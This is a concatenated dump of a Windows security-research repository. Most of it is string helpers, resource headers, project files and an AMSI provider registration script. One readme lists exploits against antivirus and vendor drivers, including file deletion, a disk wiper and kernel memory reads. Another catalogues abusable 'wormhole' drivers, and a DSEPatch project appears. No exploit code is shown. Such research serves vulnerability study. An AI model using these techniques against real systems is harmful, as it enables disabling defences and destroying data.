/source/StripDebug/minirtl/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Length of a narrow string in chars, not counting the terminator.
 *
 * A null s is treated as empty and returns 0. The count runs until the
 * first NUL byte with no upper bound, so the caller must pass a
 * NUL-terminated buffer.
 */
size_t _strlen_a(const char *s)
{
    size_t count = 0;

    if (s != 0) {
        while (s[count] != 0)
            count++;
    }

    return count;
}
15 |
/*
 * Length of a wide string in wchar_t units, not counting the terminator.
 *
 * A null s is treated as empty and returns 0. The count runs until the
 * first wide NUL with no upper bound, so the caller must pass a
 * NUL-terminated buffer. The result is a character count, not a byte
 * count.
 */
size_t _strlen_w(const wchar_t *s)
{
    size_t count = 0;

    if (s != 0) {
        while (s[count] != 0)
            count++;
    }

    return count;
}
28 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Count the chars in s up to, but excluding, the NUL terminator.
 *
 * Returns 0 for a null pointer. No maximum length is applied, so an
 * unterminated buffer is read past its end.
 */
size_t _strlen_a(const char *s)
{
    const char *cursor;

    if (!s)
        return 0;

    for (cursor = s; *cursor; ++cursor)
        ;

    return (size_t)(cursor - s);
}
15 |
/*
 * Count the wchar_t units in s up to, but excluding, the NUL terminator.
 *
 * Returns 0 for a null pointer. No maximum length is applied, so an
 * unterminated buffer is read past its end. The result counts
 * characters, not bytes.
 */
size_t _strlen_w(const wchar_t *s)
{
    const wchar_t *cursor;

    if (!s)
        return 0;

    for (cursor = s; *cursor; ++cursor)
        ;

    return (size_t)(cursor - s);
}
28 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Narrow-string length.
 *
 * Returns how many chars precede the NUL terminator of s, or 0 if s is
 * a null pointer. The scan is unbounded: the buffer must be
 * NUL-terminated, and callers sizing a destination from this value must
 * add room for the terminator themselves.
 */
size_t _strlen_a(const char *s)
{
    size_t length;

    if (s == 0)
        return 0;

    length = 0;
    for (;;) {
        if (s[length] == 0)
            break;
        length++;
    }

    return length;
}
15 |
/*
 * Wide-string length.
 *
 * Returns how many wchar_t units precede the NUL terminator of s, or 0
 * if s is a null pointer. The scan is unbounded: the buffer must be
 * NUL-terminated. The value is a character count; multiply by
 * sizeof(wchar_t) when a byte size is needed.
 */
size_t _strlen_w(const wchar_t *s)
{
    size_t length;

    if (s == 0)
        return 0;

    length = 0;
    for (;;) {
        if (s[length] == 0)
            break;
        length++;
    }

    return length;
}
28 |
--------------------------------------------------------------------------------
/source/NtCall64_LogParser/NtCall64_LogParser.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | c:\makeexe\ntcall64.log
5 | WindowsLocalDebugger
6 |
7 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/minirtl/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Number of chars in the narrow string s before its NUL terminator.
 *
 * A null pointer gives 0. Nothing limits how far the scan runs, so s
 * has to be NUL-terminated.
 */
size_t _strlen_a(const char *s)
{
    size_t n = 0;

    if (s != 0) {
        for (; s[n] != 0; n++)
            ;
    }

    return n;
}
15 |
/*
 * Count the characters in a NUL-terminated wide string.
 *
 * s: string to measure; may be null.
 *
 * Returns the wchar_t count excluding the terminator, 0 for null.
 * The scan is unbounded and relies on the terminator being present.
 */
size_t _strlen_w(const wchar_t *s)
{
    const wchar_t *cursor;

    if (s == 0)
        return 0;

    cursor = s;
    while (*cursor != 0)
        ++cursor;

    return (size_t)(cursor - s);
}
28 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Implementation of DllMain.
2 |
3 | #include "stdafx.h"
4 | #include "resource.h"
5 | #include "AmsiScan_i.h"
6 | #include "dllmain.h"
7 |
8 | CAmsiScanModule _AtlModule;
9 |
// DLL entry point: hands the loader notification to the ATL module object
// and returns whatever that object reports.
extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
    // The instance handle is not needed here; reference it once so the
    // compiler does not flag the parameter as unused.
    (void)hInstance;

    return _AtlModule.DllMain(dwReason, lpReserved);
}
16 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/srvany2.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | C:\new\zoomit.exe "-win32k -sc 1024 -pc 1024 logn"
5 | WindowsLocalDebugger
6 |
7 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Length of a NUL-terminated ANSI string.
 *
 * s: string to measure, or null.
 *
 * Returns 0 for a null pointer, otherwise the number of characters before
 * the terminator. No upper bound is applied, so the buffer handed in must
 * contain a terminator.
 */
size_t _strlen_a(const char *s)
{
    const char *end = s;

    if (!s)
        return 0;

    for (; *end; ++end)
        ;

    return (size_t)(end - s);
}
15 |
/*
 * Length of a NUL-terminated wide string.
 *
 * s: string to measure, or null.
 *
 * Returns 0 for a null pointer, otherwise the number of wchar_t elements
 * before the terminator. No upper bound is applied, so the buffer handed
 * in must contain a terminator.
 */
size_t _strlen_w(const wchar_t *s)
{
    const wchar_t *end = s;

    if (!s)
        return 0;

    for (; *end; ++end)
        ;

    return (size_t)(end - s);
}
28 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by ver.rc
4 |
5 | // Next default values for new objects
6 | //
7 | #ifdef APSTUDIO_INVOKED
8 | #ifndef APSTUDIO_READONLY_SYMBOLS
9 | #define _APS_NEXT_RESOURCE_VALUE 101
10 | #define _APS_NEXT_COMMAND_VALUE 40001
11 | #define _APS_NEXT_CONTROL_VALUE 1001
12 | #define _APS_NEXT_SYMED_VALUE 101
13 | #endif
14 | #endif
15 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by resource.rc
4 |
5 | // Next default values for new objects
6 | //
7 | #ifdef APSTUDIO_INVOKED
8 | #ifndef APSTUDIO_READONLY_SYMBOLS
9 | #define _APS_NEXT_RESOURCE_VALUE 101
10 | #define _APS_NEXT_COMMAND_VALUE 40001
11 | #define _APS_NEXT_CONTROL_VALUE 1001
12 | #define _APS_NEXT_SYMED_VALUE 101
13 | #endif
14 | #endif
15 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/DumpPhys.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/DumpPort.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/source/IntelNal/Makefile:
--------------------------------------------------------------------------------
1 | iqvandroid-objs := \
2 | src/linuxnaldriver.o \
3 | src/linuxdriverpci_i.o \
4 | src/linuxdriveros_i.o \
5 | src/linuxdriverdevice_i.o \
6 | src/nalioctldrv.o
7 |
8 | EXTRA_CFLAGS := \
9 | -DNAL_LINUX -DNAL_LINUX_ANDROID -DNAL_DRIVER -DLINUX -D__KERNEL__ -DMODULE \
10 | -Idrivers/external_drivers/drivers/misc/iqvandroid/inc/ \
11 | -Idrivers/external_drivers/drivers/misc/iqvandroid/inc/linux \
12 |
13 | obj-$(CONFIG_INTEL_IQVANDROID) = iqvandroid.o
14 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/stdafx.cpp:
--------------------------------------------------------------------------------
1 | //-----------------------------------------------------------------------------
2 | // Author : hiyohiyo
3 | // Mail : hiyohiyo@crystalmark.info
4 | // Web : http://openlibsys.org/
5 | // License : The modified BSD license
6 | //
7 | // Copyright 2007 OpenLibSys.org. All rights reserved.
8 | //-----------------------------------------------------------------------------
9 |
10 | #include "stdafx.h"
11 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/SOURCES:
--------------------------------------------------------------------------------
1 | #
2 | # setup visualC++ source browsing
3 | #
4 | BSCMAKE_FLAGS=$(BSCMAKE_FLAGS) -n
5 |
6 |
7 |
8 | !if $(AMD64)
9 | ! message BUILDMSG: Info : Building amd64 Inpoutx64.sys
10 | TARGETNAME=inpoutx64
11 | !else
12 | !message BUILDMSG: Info : Building i386 Inpout32.sys
13 | TARGETNAME=inpout32
14 | !endif
15 |
16 | _NT_TARGET_VERSION = 0x0500
17 | TARGETPATH=obj
18 | TARGETTYPE=DRIVER
19 | INCLUDES=..\
20 |
21 | SOURCES=hwinterfacedrv.c hwinterfacedrv.rc
22 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/.gitignore:
--------------------------------------------------------------------------------
1 | # Prerequisites
2 | *.d
3 |
4 | # Compiled Object files
5 | *.slo
6 | *.lo
7 | *.o
8 | *.obj
9 |
10 | # Precompiled Headers
11 | *.gch
12 | *.pch
13 |
14 | # Compiled Dynamic libraries
15 | *.so
16 | *.dylib
17 | *.dll
18 |
19 | # Fortran module files
20 | *.mod
21 | *.smod
22 |
23 | # Compiled Static libraries
24 | *.lai
25 | *.la
26 | *.a
27 | *.lib
28 |
29 | # Executables
30 | *.exe
31 | *.out
32 | *.app
33 |
34 | # Ignore vscode files
35 | .vscode
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by OlsDll.rc
4 | //
5 |
6 | // Next default values for new objects
7 | //
8 | #ifdef APSTUDIO_INVOKED
9 | #ifndef APSTUDIO_READONLY_SYMBOLS
10 | #define _APS_NEXT_RESOURCE_VALUE 101
11 | #define _APS_NEXT_COMMAND_VALUE 40001
12 | #define _APS_NEXT_CONTROL_VALUE 1001
13 | #define _APS_NEXT_SYMED_VALUE 101
14 | #endif
15 | #endif
16 |
--------------------------------------------------------------------------------
/source/DrvTools/src/DrvTools.lpr:
--------------------------------------------------------------------------------
1 | program DrvTools;
2 |
3 | {$mode objfpc}{$H+}
4 |
5 | uses
6 | {$IFDEF UNIX}{$IFDEF UseCThreads}
7 | cthreads,
8 | {$ENDIF}{$ENDIF}
9 | Interfaces, // this includes the LCL widgetset
10 | Forms, Unit1, scmsup, nativesup;
11 |
12 | {$R *.res}
13 |
14 | begin
15 | RequireDerivedFormResource:=True;
16 | Application.Scaled:=True;
17 | Application.Initialize;
18 | Application.CreateForm(TMainForm, MainForm);
19 | Application.Run;
20 | end.
21 |
22 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Developer Studio generated include file.
3 | // Used by WinIo.rc
4 | //
5 |
6 | // Next default values for new objects
7 | //
8 | #ifdef APSTUDIO_INVOKED
9 | #ifndef APSTUDIO_READONLY_SYMBOLS
10 | #define _APS_NEXT_RESOURCE_VALUE 101
11 | #define _APS_NEXT_COMMAND_VALUE 40001
12 | #define _APS_NEXT_CONTROL_VALUE 1000
13 | #define _APS_NEXT_SYMED_VALUE 101
14 | #endif
15 | #endif
16 |
--------------------------------------------------------------------------------
/source/wdextract/README.md:
--------------------------------------------------------------------------------
1 |
2 | # wdextract
3 | ## Extract Windows Defender database from vdm files and unpack it
4 |
5 | Based on original PowerShell script https://gist.github.com/mattifestation/3af5a472e11b7e135273e71cb5fed866
6 |
7 | Rewritten in C++ because it is much faster than any script.
8 |
9 | ### Usage wdextract "vdm filename"
10 |
11 | + This program is distributed as-is;
12 | + Uses ZLIB Data Compression Library (https://github.com/madler/zlib);
13 | + Built with MSVC 2017 with SDK 17763.
14 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/global.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #if defined (_MSC_VER)
4 | #if (_MSC_VER >= 1900) //VS15, 17 etc
5 | #ifdef _DEBUG
6 | #pragma comment(lib, "vcruntimed.lib")
7 | #pragma comment(lib, "ucrtd.lib")
8 | #else
9 | #pragma comment(lib, "libucrt.lib")
10 | #pragma comment(lib, "libvcruntime.lib")
11 | #endif
12 | #endif
13 | #endif
14 |
15 | #include
16 | #include
17 | #include "minirtl/minirtl.h"
18 |
19 | extern HMODULE g_currentModule;
20 | extern LONG g_cRefDll;
21 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/readme.txt:
--------------------------------------------------------------------------------
1 | Collection of "wormhole" open source drivers widely used by hardware vendors, sometimes in an unmodified state.
2 |
3 | MAPMEM - NTDDK 3.51 example from 1993, multiple usage, noticeable usage by Gigabyte, SuperMicro
4 | PHYMEM - by akui, multiple usage, noticeable usage by Realtek, SuperMicro
5 | WINIO - by Yariv Kaplan, multiple usage, ENETECH I/O drivers main source of inspiration
6 | WINRING0 - by hiyohiyo, multiple usage, literally everywhere
7 | INPOUT - by Phillip Gibbon, based on hwinterface by Logix4U.
8 |
9 | (c) drivers authors
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiProvider.rgs:
--------------------------------------------------------------------------------
1 | HKCR
2 | {
3 | NoRemove CLSID
4 | {
5 | ForceRemove {1c0643e1-5b0a-4420-9b76-0de9264b4c59} = s 'AmsiProvider'
6 | {
7 | ForceRemove Programmable
8 | InprocServer32 = s '%MODULE%'
9 | {
10 | val ThreadingModel = s 'Both'
11 | }
12 | }
13 | }
14 | }
15 |
16 | HKLM
17 | {
18 | NoRemove SOFTWARE {
19 | NoRemove Microsoft {
20 | NoRemove AMSI {
21 | NoRemove Providers {
22 | ForceRemove {1c0643e1-5b0a-4420-9b76-0de9264b4c59} = s 'AmsiProvider'
23 | }
24 | }
25 | }
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Windows.Forms;
4 |
namespace DumpPhys
{
    /// <summary>
    /// Holds the process entry point of the DumpPhys sample.
    /// </summary>
    static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        static void Main()
        {
            // Configure the Windows Forms defaults first, then create the
            // main form and run the message loop on it.
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);

            Form1 mainWindow = new Form1();
            Application.Run(mainWindow);
        }
    }
}
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Windows.Forms;
4 |
namespace DumpPort
{
    /// <summary>
    /// Holds the process entry point of the DumpPort sample.
    /// </summary>
    static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        static void Main()
        {
            // Configure the Windows Forms defaults first, then create the
            // main form and run the message loop on it.
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);

            Form1 mainWindow = new Form1();
            Application.Run(mainWindow);
        }
    }
}
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by AmsiScan.rc
4 | //
5 | #define IDS_PROJNAME 100
6 | #define IDR_AMSISCAN 101
7 | #define IDR_AMSIPROVIDER 106
8 |
9 | // Next default values for new objects
10 | //
11 | #ifdef APSTUDIO_INVOKED
12 | #ifndef APSTUDIO_READONLY_SYMBOLS
13 | #define _APS_NEXT_RESOURCE_VALUE 201
14 | #define _APS_NEXT_COMMAND_VALUE 32768
15 | #define _APS_NEXT_CONTROL_VALUE 201
16 | #define _APS_NEXT_SYMED_VALUE 107
17 | #endif
18 | #endif
19 |
--------------------------------------------------------------------------------
/source/SecTrash/readme.txt:
--------------------------------------------------------------------------------
1 | secureaplus.c - SecureAPlus AV SAScan driver Denial of Service
2 | iobitcallbacks.c - IObit Malware Fighter ImfObCallback.sys bypass
3 | bkavsp.c - BKAVSP Arbitrary File Deletion
4 | superantispyware.c - SUPERAntispyware disk wiper
5 | maxproc64.c - MaxSecure MaxProc64 driver Denial of Service
6 | iobit_winring0.c - IOBit WinRing0 driver information disclosure
7 | asusgio2.c - ASUS GiveIO driver unlock
8 | logitech.c - Logitech LgCoreTemp.sys driver information disclosure
9 | enetech.c - EneTech driver arbitrary kernel memory read/information disclosure
10 | glckio2.c - Gigabyte glckio2 driver information disclosure/unlock
11 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Append the ANSI string src to the end of dest.
 *
 * dest: NUL-terminated destination buffer; returned untouched when null.
 * src:  NUL-terminated string to append; when null nothing is written.
 *
 * Returns dest unchanged when either pointer is null. Otherwise returns a
 * pointer to the NEW terminator of dest (not to its start, unlike the
 * standard strcat).
 *
 * No size is passed in, so nothing limits the copy: the caller must make
 * sure dest has room for both strings plus the terminator, otherwise the
 * write runs past the end of the buffer.
 */
char *_strcat_a(char *dest, const char *src)
{
    char *tail = dest;

    if (dest == 0 || src == 0)
        return dest;

    /* Locate the current terminator of dest. */
    while (*tail != 0)
        tail++;

    /* Copy src including its terminator; tail ends up on that terminator. */
    while ((*tail = *src) != 0) {
        tail++;
        src++;
    }

    return tail;
}
20 |
/*
 * Append the wide string src to the end of dest.
 *
 * dest: NUL-terminated destination buffer; returned untouched when null.
 * src:  NUL-terminated string to append; when null nothing is written.
 *
 * Returns dest unchanged when either pointer is null. Otherwise returns a
 * pointer to the NEW terminator of dest (not to its start, unlike the
 * standard wcscat).
 *
 * No size is passed in, so nothing limits the copy: the caller must make
 * sure dest has room for both strings plus the terminator, otherwise the
 * write runs past the end of the buffer.
 */
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *tail = dest;

    if (dest == 0 || src == 0)
        return dest;

    /* Locate the current terminator of dest. */
    while (*tail != 0)
        tail++;

    /* Copy src including its terminator; tail ends up on that terminator. */
    while ((*tail = *src) != 0) {
        tail++;
        src++;
    }

    return tail;
}
38 |
--------------------------------------------------------------------------------
/source/StripDebug/minirtl/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Concatenate: copy the ANSI string src onto the end of dest.
 *
 * dest: NUL-terminated buffer to extend (null is tolerated).
 * src:  NUL-terminated string to append (null is tolerated).
 *
 * Returns dest as passed when either argument is null; otherwise a pointer
 * to the terminator written at the end of the combined string.
 *
 * The routine has no knowledge of the size of dest. Callers are responsible
 * for guaranteeing strlen(dest) + strlen(src) + 1 characters of space.
 */
char *_strcat_a(char *dest, const char *src)
{
    char *out;

    if (!dest || !src)
        return dest;

    /* Skip over what dest already holds. */
    for (out = dest; *out != 0; out++)
        ;

    /* Append the characters of src one by one. */
    for (; *src != 0; src++, out++)
        *out = *src;

    *out = 0;
    return out;
}
20 |
/*
 * Concatenate: copy the wide string src onto the end of dest.
 *
 * dest: NUL-terminated buffer to extend (null is tolerated).
 * src:  NUL-terminated string to append (null is tolerated).
 *
 * Returns dest as passed when either argument is null; otherwise a pointer
 * to the terminator written at the end of the combined string.
 *
 * The routine has no knowledge of the size of dest. Callers are responsible
 * for guaranteeing room for both strings plus one terminating element.
 */
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *out;

    if (!dest || !src)
        return dest;

    /* Skip over what dest already holds. */
    for (out = dest; *out != 0; out++)
        ;

    /* Append the characters of src one by one. */
    for (; *src != 0; src++, out++)
        *out = *src;

    *out = 0;
    return out;
}
38 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/DSEPatch.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | WindowsLocalDebugger
7 |
8 |
9 | -r
10 | WindowsLocalDebugger
11 |
12 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Append the ANSI string src to the end of dest.
 *
 * dest: NUL-terminated destination buffer; returned untouched when null.
 * src:  NUL-terminated string to append; when null nothing is written.
 *
 * Returns dest unchanged when either pointer is null, otherwise a pointer
 * to the new terminator of dest rather than to its first character.
 *
 * The copy is unbounded. dest must be large enough for the existing text,
 * the appended text and the terminator; that is the caller's job to check.
 */
char *_strcat_a(char *dest, const char *src)
{
    char *tail = dest;

    if (dest == 0 || src == 0)
        return dest;

    /* Locate the current terminator of dest. */
    while (*tail != 0)
        tail++;

    /* Copy src including its terminator; tail ends up on that terminator. */
    while ((*tail = *src) != 0) {
        tail++;
        src++;
    }

    return tail;
}
20 |
/*
 * Append the wide string src to the end of dest.
 *
 * dest: NUL-terminated destination buffer; returned untouched when null.
 * src:  NUL-terminated string to append; when null nothing is written.
 *
 * Returns dest unchanged when either pointer is null, otherwise a pointer
 * to the new terminator of dest rather than to its first element.
 *
 * The copy is unbounded. dest must be large enough for the existing text,
 * the appended text and the terminator; that is the caller's job to check.
 */
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *tail = dest;

    if (dest == 0 || src == 0)
        return dest;

    /* Locate the current terminator of dest. */
    while (*tail != 0)
        tail++;

    /* Copy src including its terminator; tail ends up on that terminator. */
    while ((*tail = *src) != 0) {
        tail++;
        src++;
    }

    return tail;
}
38 |
--------------------------------------------------------------------------------
/source/DrvTools/src/ppas.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | SET THEFILE=C:\Work\DrvTools\DrvTools32.exe
3 | echo Linking %THEFILE%
4 | C:\lazarus\fpc\3.2.0\bin\x86_64-win64\ld.exe -b pei-i386 -m i386pe --gc-sections -s --subsystem windows --entry=_WinMainCRTStartup -o C:\Work\DrvTools\DrvTools32.exe C:\Work\DrvTools\link.res
5 | if errorlevel 1 goto linkend
6 | C:\lazarus\fpc\3.2.0\bin\x86_64-win64\postw32.exe --subsystem gui --input C:\Work\DrvTools\DrvTools32.exe --stack 16777216
7 | if errorlevel 1 goto linkend
8 | goto end
9 | :asmend
10 | echo An error occurred while assembling %THEFILE%
11 | goto end
12 | :linkend
13 | echo An error occurred while linking %THEFILE%
14 | :end
15 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/minirtl/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Concatenate: copy the ANSI string src onto the end of dest.
 *
 * dest: NUL-terminated buffer to extend (null is tolerated).
 * src:  NUL-terminated string to append (null is tolerated).
 *
 * Returns dest as passed when either argument is null; otherwise a pointer
 * to the terminator written at the end of the combined string.
 *
 * There is no length argument and no bounds check; the destination buffer
 * must already be known to be big enough.
 */
char *_strcat_a(char *dest, const char *src)
{
    char *out;

    if (!dest || !src)
        return dest;

    /* Skip over what dest already holds. */
    for (out = dest; *out != 0; out++)
        ;

    /* Append the characters of src one by one. */
    for (; *src != 0; src++, out++)
        *out = *src;

    *out = 0;
    return out;
}
20 |
/*
 * Concatenate: copy the wide string src onto the end of dest.
 *
 * dest: NUL-terminated buffer to extend (null is tolerated).
 * src:  NUL-terminated string to append (null is tolerated).
 *
 * Returns dest as passed when either argument is null; otherwise a pointer
 * to the terminator written at the end of the combined string.
 *
 * There is no length argument and no bounds check; the destination buffer
 * must already be known to be big enough.
 */
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *out;

    if (!dest || !src)
        return dest;

    /* Skip over what dest already holds. */
    for (out = dest; *out != 0; out++)
        ;

    /* Append the characters of src one by one. */
    for (; *src != 0; src++, out++)
        *out = *src;

    *out = 0;
    return out;
}
38 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/test.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "test"=.\test.dsp - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/PCIFlt.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "PCIFlt"=.\PCIFlt.dsp - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/pmdll.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "pmdll"=.\pmdll.dsp - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Append the ANSI string src to the end of dest.
 *
 * dest: NUL-terminated destination buffer; returned untouched when null.
 * src:  NUL-terminated string to append; when null nothing is written.
 *
 * Returns dest unchanged when either pointer is null. Otherwise returns a
 * pointer to the terminator that now ends dest, which lets a caller keep
 * appending from that position.
 *
 * Capacity is never checked. Every call site must guarantee that dest can
 * hold the combined string plus the terminator.
 */
char *_strcat_a(char *dest, const char *src)
{
    char *tail = dest;

    if (dest == 0 || src == 0)
        return dest;

    /* Locate the current terminator of dest. */
    while (*tail != 0)
        tail++;

    /* Copy src including its terminator; tail ends up on that terminator. */
    while ((*tail = *src) != 0) {
        tail++;
        src++;
    }

    return tail;
}
20 |
/*
 * Append the wide string src to the end of dest.
 *
 * dest: NUL-terminated destination buffer; returned untouched when null.
 * src:  NUL-terminated string to append; when null nothing is written.
 *
 * Returns dest unchanged when either pointer is null. Otherwise returns a
 * pointer to the terminator that now ends dest, which lets a caller keep
 * appending from that position.
 *
 * Capacity is never checked. Every call site must guarantee that dest can
 * hold the combined string plus the terminator.
 */
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *tail = dest;

    if (dest == 0 || src == 0)
        return dest;

    /* Locate the current terminator of dest. */
    while (*tail != 0)
        tail++;

    /* Copy src including its terminator; tail ends up on that terminator. */
    while ((*tail = *src) != 0) {
        tail++;
        src++;
    }

    return tail;
}
38 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/driver/phymem.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "phymem"=.\phymem.dsp - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently,
3 | // but are changed infrequently
4 |
5 | #pragma once
6 |
7 | #ifndef STRICT
8 | #define STRICT
9 | #endif
10 |
11 | #include "targetver.h"
12 |
13 | #define _ATL_APARTMENT_THREADED
14 |
15 | #define _ATL_NO_AUTOMATIC_NAMESPACE
16 |
17 | #define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit
18 |
19 |
20 | #define ATL_NO_ASSERT_ON_DESTROY_NONEXISTENT_WINDOW
21 |
22 | #include "resource.h"
23 | #include
24 | #include
25 | #include
26 |
--------------------------------------------------------------------------------
/source/wdextract/wdextract/pch.h:
--------------------------------------------------------------------------------
1 | // Tips for Getting Started:
2 | // 1. Use the Solution Explorer window to add/manage files
3 | // 2. Use the Team Explorer window to connect to source control
4 | // 3. Use the Output window to see build output and other messages
